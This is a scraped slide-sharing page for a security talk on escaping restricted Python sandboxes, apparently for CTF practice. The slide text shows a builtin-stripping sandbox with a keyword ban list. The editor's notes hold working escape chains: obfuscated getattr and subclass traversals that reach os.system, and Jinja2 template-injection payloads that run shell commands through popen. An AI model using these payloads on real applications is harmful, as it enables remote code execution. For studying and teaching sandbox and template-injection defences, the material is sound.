Escaping the python sandbox

Tomer Zait
Tomer ZaitSecurity Researcher at F5 Networks
Escaping the python sandbox
$
•
•
•
•
• @realgam3
• https://linkedin.com/in/realgam3
• https://github.com/realgam3
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Objects
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
Escaping the python sandbox
from __future__ import print_function
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]
banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]
Escaping the python sandbox
https://Links
• http://pyconil2018.realgame.co.il
• https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-
5-PySandbox.pdf
• https://github.com/vstinner/pysandbox
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-
flask-jinja2.html
If You Really Like CTF Challenges
Escaping the python sandbox
Escaping the python sandbox
1 of 30

Recommended

Pemrograman C++ - Operasi Berkas by
Pemrograman C++ - Operasi BerkasPemrograman C++ - Operasi Berkas
Pemrograman C++ - Operasi BerkasKuliahKita
850 views11 slides
Kriptograf - Algoritma Kriptografi Klasik (bagian 1) by
Kriptograf - Algoritma Kriptografi Klasik (bagian 1)Kriptograf - Algoritma Kriptografi Klasik (bagian 1)
Kriptograf - Algoritma Kriptografi Klasik (bagian 1)KuliahKita
27.4K views33 slides
Matematika Diskrit - 07 teori bilangan - 02 by
Matematika Diskrit - 07 teori bilangan - 02Matematika Diskrit - 07 teori bilangan - 02
Matematika Diskrit - 07 teori bilangan - 02KuliahKita
9.5K views4 slides
Algoritma C4.5 Dalam Data Mining by
Algoritma C4.5 Dalam Data MiningAlgoritma C4.5 Dalam Data Mining
Algoritma C4.5 Dalam Data MiningNasha Dmasive
5.2K views13 slides
Introduction of ssis by
Introduction of ssisIntroduction of ssis
Introduction of ssisdeepakk073
10.1K views31 slides
Jaringan Komputer - Analisis PDU by
Jaringan Komputer - Analisis PDUJaringan Komputer - Analisis PDU
Jaringan Komputer - Analisis PDUUniversitas Gadjah Mada
2K views16 slides

More Related Content

What's hot

Python Seaborn Data Visualization by
Python Seaborn Data Visualization Python Seaborn Data Visualization
Python Seaborn Data Visualization Sourabh Sahu
2.3K views18 slides
SQL Functions by
SQL FunctionsSQL Functions
SQL Functionsammarbrohi
5.3K views48 slides
Lecture 3 object-oriented design by
Lecture 3    object-oriented designLecture 3    object-oriented design
Lecture 3 object-oriented designNada G.Youssef
1.2K views137 slides
Data Analysis With Pandas by
Data Analysis With PandasData Analysis With Pandas
Data Analysis With PandasStephan Solomonidis
2K views47 slides
Introduction: Relational to Graphs by
Introduction: Relational to GraphsIntroduction: Relational to Graphs
Introduction: Relational to GraphsNeo4j
2.2K views55 slides
Klasifikasi - Algoritma Naive Bayes by
Klasifikasi - Algoritma Naive Bayes Klasifikasi - Algoritma Naive Bayes
Klasifikasi - Algoritma Naive Bayes Elvi Rahmi
320 views41 slides

What's hot(20)

Python Seaborn Data Visualization by Sourabh Sahu
Python Seaborn Data Visualization Python Seaborn Data Visualization
Python Seaborn Data Visualization
Sourabh Sahu2.3K views
SQL Functions by ammarbrohi
SQL FunctionsSQL Functions
SQL Functions
ammarbrohi5.3K views
Lecture 3 object-oriented design by Nada G.Youssef
Lecture 3    object-oriented designLecture 3    object-oriented design
Lecture 3 object-oriented design
Nada G.Youssef1.2K views
Introduction: Relational to Graphs by Neo4j
Introduction: Relational to GraphsIntroduction: Relational to Graphs
Introduction: Relational to Graphs
Neo4j2.2K views
Klasifikasi - Algoritma Naive Bayes by Elvi Rahmi
Klasifikasi - Algoritma Naive Bayes Klasifikasi - Algoritma Naive Bayes
Klasifikasi - Algoritma Naive Bayes
Elvi Rahmi320 views
Nested Queries Lecture by Felipe Costa
Nested Queries LectureNested Queries Lecture
Nested Queries Lecture
Felipe Costa5.3K views
Algoritma dan Struktur Data - tumpukan by Georgius Rinaldo
Algoritma dan Struktur Data - tumpukanAlgoritma dan Struktur Data - tumpukan
Algoritma dan Struktur Data - tumpukan
Georgius Rinaldo3.2K views
Kriptografi - Kriptografi Kunci Publik by KuliahKita
Kriptografi - Kriptografi Kunci PublikKriptografi - Kriptografi Kunci Publik
Kriptografi - Kriptografi Kunci Publik
KuliahKita12.6K views
Understanding Semi-Space Garbage Collector in ART by Haifeng Li
Understanding Semi-Space Garbage Collector in ARTUnderstanding Semi-Space Garbage Collector in ART
Understanding Semi-Space Garbage Collector in ART
Haifeng Li506 views
LeetCode Solutions In Java .pdf by zupsezekno
LeetCode Solutions In Java .pdfLeetCode Solutions In Java .pdf
LeetCode Solutions In Java .pdf
zupsezekno4.8K views
Dimensional Modeling Basic Concept with Example by Sajjad Zaheer
Dimensional Modeling Basic Concept with ExampleDimensional Modeling Basic Concept with Example
Dimensional Modeling Basic Concept with Example
Sajjad Zaheer24.6K views
Loop invarient by Amit Rathi
Loop invarientLoop invarient
Loop invarient
Amit Rathi512 views
Maps and Meaning: Graph-based Entity Resolution in Apache Spark & GraphX by Databricks
Maps and Meaning: Graph-based Entity Resolution in Apache Spark & GraphXMaps and Meaning: Graph-based Entity Resolution in Apache Spark & GraphX
Maps and Meaning: Graph-based Entity Resolution in Apache Spark & GraphX
Databricks1.1K views

More from Tomer Zait

The evolution of credential hijacking by
The evolution of credential hijackingThe evolution of credential hijacking
The evolution of credential hijackingTomer Zait
431 views37 slides
PyMultiTor by
PyMultiTorPyMultiTor
PyMultiTorTomer Zait
490 views35 slides
PyMultitor by
PyMultitorPyMultitor
PyMultitorTomer Zait
316 views33 slides
Hacking 101 for developers by
Hacking 101 for developersHacking 101 for developers
Hacking 101 for developersTomer Zait
307 views31 slides
Buffer overflow – Smashing The Stack by
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
642 views33 slides
Java - abstract class methods by
Java - abstract class methodsJava - abstract class methods
Java - abstract class methodsTomer Zait
779 views7 slides

More from Tomer Zait(6)

The evolution of credential hijacking by Tomer Zait
The evolution of credential hijackingThe evolution of credential hijacking
The evolution of credential hijacking
Tomer Zait431 views
Hacking 101 for developers by Tomer Zait
Hacking 101 for developersHacking 101 for developers
Hacking 101 for developers
Tomer Zait307 views
Buffer overflow – Smashing The Stack by Tomer Zait
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait642 views
Java - abstract class methods by Tomer Zait
Java - abstract class methodsJava - abstract class methods
Java - abstract class methods
Tomer Zait779 views

Recently uploaded

Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium... by
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...Lisi Hocke
28 views124 slides
Dapr Unleashed: Accelerating Microservice Development by
Dapr Unleashed: Accelerating Microservice DevelopmentDapr Unleashed: Accelerating Microservice Development
Dapr Unleashed: Accelerating Microservice DevelopmentMiroslav Janeski
10 views29 slides
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ... by
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...Donato Onofri
795 views34 slides
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko... by
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...Deltares
14 views23 slides
MariaDB stored procedures and why they should be improved by
MariaDB stored procedures and why they should be improvedMariaDB stored procedures and why they should be improved
MariaDB stored procedures and why they should be improvedFederico Razzoli
8 views32 slides
HarshithAkkapelli_Presentation.pdf by
HarshithAkkapelli_Presentation.pdfHarshithAkkapelli_Presentation.pdf
HarshithAkkapelli_Presentation.pdfharshithakkapelli
11 views16 slides

Recently uploaded(20)

Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium... by Lisi Hocke
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...
Lisi Hocke28 views
Dapr Unleashed: Accelerating Microservice Development by Miroslav Janeski
Dapr Unleashed: Accelerating Microservice DevelopmentDapr Unleashed: Accelerating Microservice Development
Dapr Unleashed: Accelerating Microservice Development
Miroslav Janeski10 views
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ... by Donato Onofri
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...
Unmasking the Dark Art of Vectored Exception Handling: Bypassing XDR and EDR ...
Donato Onofri795 views
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko... by Deltares
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
Deltares14 views
MariaDB stored procedures and why they should be improved by Federico Razzoli
MariaDB stored procedures and why they should be improvedMariaDB stored procedures and why they should be improved
MariaDB stored procedures and why they should be improved
Fleet Management Software in India by Fleetable
Fleet Management Software in India Fleet Management Software in India
Fleet Management Software in India
Fleetable11 views
Generic or specific? Making sensible software design decisions by Bert Jan Schrijver
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
FIMA 2023 Neo4j & FS - Entity Resolution.pptx by Neo4j
FIMA 2023 Neo4j & FS - Entity Resolution.pptxFIMA 2023 Neo4j & FS - Entity Resolution.pptx
FIMA 2023 Neo4j & FS - Entity Resolution.pptx
Neo4j6 views
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols by Deltares
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - DolsDSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols
Deltares7 views
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx by animuscrm
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
animuscrm14 views
DSD-INT 2023 Thermobaricity in 3D DCSM-FM - taking pressure into account in t... by Deltares
DSD-INT 2023 Thermobaricity in 3D DCSM-FM - taking pressure into account in t...DSD-INT 2023 Thermobaricity in 3D DCSM-FM - taking pressure into account in t...
DSD-INT 2023 Thermobaricity in 3D DCSM-FM - taking pressure into account in t...
Deltares9 views
Tridens DevOps by Tridens
Tridens DevOpsTridens DevOps
Tridens DevOps
Tridens9 views
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra... by Marc Müller
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
Marc Müller38 views
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ... by Deltares
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
Deltares10 views
A first look at MariaDB 11.x features and ideas on how to use them by Federico Razzoli
A first look at MariaDB 11.x features and ideas on how to use themA first look at MariaDB 11.x features and ideas on how to use them
A first look at MariaDB 11.x features and ideas on how to use them
Federico Razzoli45 views
Gen Apps on Google Cloud PaLM2 and Codey APIs in Action by Márton Kodok
Gen Apps on Google Cloud PaLM2 and Codey APIs in ActionGen Apps on Google Cloud PaLM2 and Codey APIs in Action
Gen Apps on Google Cloud PaLM2 and Codey APIs in Action
Márton Kodok5 views

Escaping the python sandbox

Editor's Notes

  1. My name is Tomer Zait and I'm a security researcher on F5 Networks. I’m practical software engineer and offensive security expert. I Love CTF'S and writing open source software's. By The Way Your are welcome to contribute code, or follow me in twitter or github.
  2. Secure Pyshell: print('') print("") print(".") print(open) print(__file__) print(open(__file__)) print(getattr(open(__file__),"read")) print(getattr(open(__file__),"read")()) print(__builtins__) print(dir(__builtins__)) print(getattr(__builtins__,"vars")) print(getattr(__builtins__,"va"+"rs")) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()["os"]) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
  3. Zumbo 3: {{1+1}} {{request.environ}} {{config}} {%set a = 1+2%}{{a}} {{config.__class__.__init__.__globals__}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {{[].__class__.__base__.__subclasses__()}} {{[].__class__.__base__.__subclasses__()[351]}} {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}} http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
  4. print("".__class__.__mro__) print("".__class__.__mro__[-1].__subclasses__()) print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage')) print("".__class__.__mro__[-1].__subclasses__()[59].__init__) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"]) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
  5. Ask “What are the actual alternatives that omer simpson has”?